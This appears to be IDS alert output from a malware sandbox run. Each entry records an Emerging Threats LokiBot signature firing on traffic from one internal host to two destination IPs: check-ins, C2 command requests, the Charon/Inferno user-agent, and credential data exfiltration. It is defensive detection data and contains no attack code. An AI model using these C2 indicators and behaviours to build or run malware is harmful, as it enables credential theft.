Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249768802024313 06/23/22-17:54:59.413778
SID:	2024313
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249816802021641 06/23/22-17:55:26.329557
SID:	2021641
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249875802024318 06/23/22-17:56:08.656582
SID:	2024318
Source Port:	49875
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249743802025381 06/23/22-17:54:37.108830
SID:	2025381
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249771802025381 06/23/22-17:55:04.009923
SID:	2025381
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249757802024318 06/23/22-17:54:50.135454
SID:	2024318
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249770802024318 06/23/22-17:55:02.423254
SID:	2024318
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349745802024313 06/23/22-17:54:39.886492
SID:	2024313
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349774802021641 06/23/22-17:55:10.726793
SID:	2021641
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249769802021641 06/23/22-17:55:00.833023
SID:	2021641
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249772802025381 06/23/22-17:55:07.425069
SID:	2025381
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249852802021641 06/23/22-17:55:55.592533
SID:	2021641
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349780802024313 06/23/22-17:55:16.534873
SID:	2024313
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349872802025381 06/23/22-17:56:02.086134
SID:	2025381
Source Port:	49872
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349745802024318 06/23/22-17:54:39.886492
SID:	2024318
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249757802024313 06/23/22-17:54:50.135454
SID:	2024313
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349792802021641 06/23/22-17:55:18.935502
SID:	2021641
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349881802021641 06/23/22-17:56:16.928509
SID:	2021641
Source Port:	49881
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249882802024313 06/23/22-17:56:19.809048
SID:	2024313
Source Port:	49882
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349776802024318 06/23/22-17:55:13.438859
SID:	2024318
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349813802024313 06/23/22-17:55:22.328153
SID:	2024313
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249770802025381 06/23/22-17:55:02.423254
SID:	2025381
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349776802024313 06/23/22-17:55:13.438859
SID:	2024313
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249877802025381 06/23/22-17:56:13.789082
SID:	2025381
Source Port:	49877
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349883802021641 06/23/22-17:56:20.757705
SID:	2021641
Source Port:	49883
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349813802024318 06/23/22-17:55:22.328153
SID:	2024318
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249741802024317 06/23/22-17:54:33.910153
SID:	2024317
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249747802021641 06/23/22-17:54:44.305987
SID:	2021641
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249845802024313 06/23/22-17:55:53.427872
SID:	2024313
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249744802021641 06/23/22-17:54:38.472164
SID:	2021641
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249741802024312 06/23/22-17:54:33.910153
SID:	2024312
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349865802024313 06/23/22-17:56:00.557524
SID:	2024313
Source Port:	49865
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249762802024313 06/23/22-17:54:52.263394
SID:	2024313
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349865802024318 06/23/22-17:56:00.557524
SID:	2024318
Source Port:	49865
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249767802025381 06/23/22-17:54:57.914899
SID:	2025381
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249773802025381 06/23/22-17:55:09.049678
SID:	2025381
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249845802024318 06/23/22-17:55:53.427872
SID:	2024318
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349766802021641 06/23/22-17:54:56.372364
SID:	2021641
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249831802021641 06/23/22-17:55:33.546351
SID:	2021641
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249762802024318 06/23/22-17:54:52.263394
SID:	2024318
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249771802024313 06/23/22-17:55:04.009923
SID:	2024313
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349803802021641 06/23/22-17:55:20.890777
SID:	2021641
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349778802024313 06/23/22-17:55:15.087771
SID:	2024313
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249769802025381 06/23/22-17:55:00.833023
SID:	2025381
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349778802024318 06/23/22-17:55:15.087771
SID:	2024318
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249742802021641 06/23/22-17:54:35.573404
SID:	2021641
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249773802024318 06/23/22-17:55:09.049678
SID:	2024318
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349837802024318 06/23/22-17:55:42.276335
SID:	2024318
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349792802025381 06/23/22-17:55:18.935502
SID:	2025381
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349765802024318 06/23/22-17:54:54.716737
SID:	2024318
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349843802024313 06/23/22-17:55:45.763232
SID:	2024313
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349872802021641 06/23/22-17:56:02.086134
SID:	2021641
Source Port:	49872
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349837802024313 06/23/22-17:55:42.276335
SID:	2024313
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349881802025381 06/23/22-17:56:16.928509
SID:	2025381
Source Port:	49881
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349765802024313 06/23/22-17:54:54.716737
SID:	2024313
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249743802024313 06/23/22-17:54:37.108830
SID:	2024313
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249772802021641 06/23/22-17:55:07.425069
SID:	2021641
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249873802024313 06/23/22-17:56:04.198158
SID:	2024313
Source Port:	49873
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249875802025381 06/23/22-17:56:08.656582
SID:	2025381
Source Port:	49875
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249743802024318 06/23/22-17:54:37.108830
SID:	2024318
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349843802024318 06/23/22-17:55:45.763232
SID:	2024318
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249873802024318 06/23/22-17:56:04.198158
SID:	2024318
Source Port:	49873
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349837802025381 06/23/22-17:55:42.276335
SID:	2025381
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249859802024313 06/23/22-17:55:58.152468
SID:	2024313
Source Port:	49859
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249743802021641 06/23/22-17:54:37.108830
SID:	2021641
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249746802024318 06/23/22-17:54:42.346945
SID:	2024318
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249844802024318 06/23/22-17:55:50.553165
SID:	2024318
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249859802024318 06/23/22-17:55:58.152468
SID:	2024318
Source Port:	49859
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249746802024313 06/23/22-17:54:42.346945
SID:	2024313
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349883802025381 06/23/22-17:56:20.757705
SID:	2025381
Source Port:	49883
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249844802024313 06/23/22-17:55:50.553165
SID:	2024313
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249749802021641 06/23/22-17:54:47.375834
SID:	2021641
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349836802024318 06/23/22-17:55:40.617404
SID:	2024318
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249747802025381 06/23/22-17:54:44.305987
SID:	2025381
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249845802025381 06/23/22-17:55:53.427872
SID:	2025381
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249770802021641 06/23/22-17:55:02.423254
SID:	2021641
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349836802024313 06/23/22-17:55:40.617404
SID:	2024313
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249882802025381 06/23/22-17:56:19.809048
SID:	2025381
Source Port:	49882
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249816802024313 06/23/22-17:55:26.329557
SID:	2024313
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249877802024313 06/23/22-17:56:13.789082
SID:	2024313
Source Port:	49877
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249773802024313 06/23/22-17:55:09.049678
SID:	2024313
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349766802025381 06/23/22-17:54:56.372364
SID:	2025381
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249816802024318 06/23/22-17:55:26.329557
SID:	2024318
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249767802021641 06/23/22-17:54:57.914899
SID:	2021641
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349778802021641 06/23/22-17:55:15.087771
SID:	2021641
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349876802021641 06/23/22-17:56:11.073086
SID:	2021641
Source Port:	49876
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349775802025381 06/23/22-17:55:12.061012
SID:	2025381
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349803802025381 06/23/22-17:55:20.890777
SID:	2025381
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249877802024318 06/23/22-17:56:13.789082
SID:	2024318
Source Port:	49877
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249741802025381 06/23/22-17:54:33.910153
SID:	2025381
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349835802024313 06/23/22-17:55:36.607918
SID:	2024313
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249762802021641 06/23/22-17:54:52.263394
SID:	2021641
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349792802024318 06/23/22-17:55:18.935502
SID:	2024318
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349881802024318 06/23/22-17:56:16.928509
SID:	2024318
Source Port:	49881
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349775802024318 06/23/22-17:55:12.061012
SID:	2024318
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349835802024318 06/23/22-17:55:36.607918
SID:	2024318
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249875802021641 06/23/22-17:56:08.656582
SID:	2021641
Source Port:	49875
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349775802024313 06/23/22-17:55:12.061012
SID:	2024313
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349865802025381 06/23/22-17:56:00.557524
SID:	2025381
Source Port:	49865
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

